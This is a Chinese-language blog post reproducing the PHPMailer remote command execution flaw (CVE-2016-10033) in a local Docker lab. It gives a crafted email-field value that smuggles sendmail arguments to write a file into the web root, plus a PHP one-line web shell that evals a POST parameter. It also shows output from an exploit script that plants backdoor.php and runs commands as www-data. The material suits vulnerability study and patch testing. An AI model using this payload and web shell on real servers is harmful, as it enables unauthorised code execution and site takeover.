美文网首页
2020-12-31PHPMailer远程命令执行漏洞复现

2020-12-31PHPMailer远程命令执行漏洞复现

作者: thelostworldSec | 来源:发表于2020-12-31 15:52 被阅读0次

    ​PHPMailer远程命令执行漏洞复现

    一、漏洞简介

    PHPMailer是PHP电子邮件创建及传输类,用于多个开源项目:WordPress, Drupal, 1CRM, SugarCRM, Yii, Joomla!等。

    PHPMailer < 5.2.18版本存在安全漏洞,可使未经身份验证的远程攻击者在Web服务器用户上下文中执行任意代码,远程控制目标web应用。

    二、影响版本:

    PHPMailer<5.2.18

    三、漏洞复现

    Docker环境:

    dockerrun --rm -it -p8080:80vulnerables/cve-2016-10033

    拉去镜像启动环境:

    http://192.168.1.107:8080/

    http://192.168.1.107:8080/在name处随便输入比如“aaa”,在email处输入:​"aaa". -OQueueDirectory=/tmp/. -X/var/www/html/a.php @aaa.com在message处输入一句话木马:​<?php@eval($_POST['thelostworld']);?>

    上传完一句话木马后,页面会响应3-5分钟,响应时间较长

    木马地址:http://192.168.1.107:8080/a.php 密码:thelostworld

     虚拟终端:

    使用脚本:

    获取脚本后台回复“PHPMailer”获取脚本

    ➜  Desktop ./exploit.sh192.168.1.107:8080[+] CVE-2016-10033exploitbyopsxcq[+] Exploiting192.168.1.107:8080​​[+] Target exploited, acessing shell at http://192.168.1.107:8080/backdoor.php[+] Checkingifthe backdoor was createdontarget system[+] Backdoor.php foundonremote system[+] Running whoamiwww-dataRemoteShell> [+] Running ​​RemoteShell> id[+] Running iduid=33(www-data) gid=33(www-data) groups=33(www-data)

    访问木马地址:

    http://192.168.1.107:8080/backdoor.php

    参考:

    https://www.cnblogs.com/Hi-blog/p/7812008.html

    https://www.exploit-db.com/exploits/40968

    免责声明:本站提供安全工具、程序(方法)可能带有攻击性,仅供安全研究与教学之用,风险自负!

    转载声明:著作权归作者所有。商业转载请联系作者获得授权,非商业转载请注明出处。

    订阅查看更多复现文章、学习笔记

    thelostworld

    安全路上,与你并肩前行!!!!

    相关文章

      网友评论

          本文标题:2020-12-31PHPMailer远程命令执行漏洞复现

          本文链接:https://www.haomeiwen.com/subject/zhfroktx.html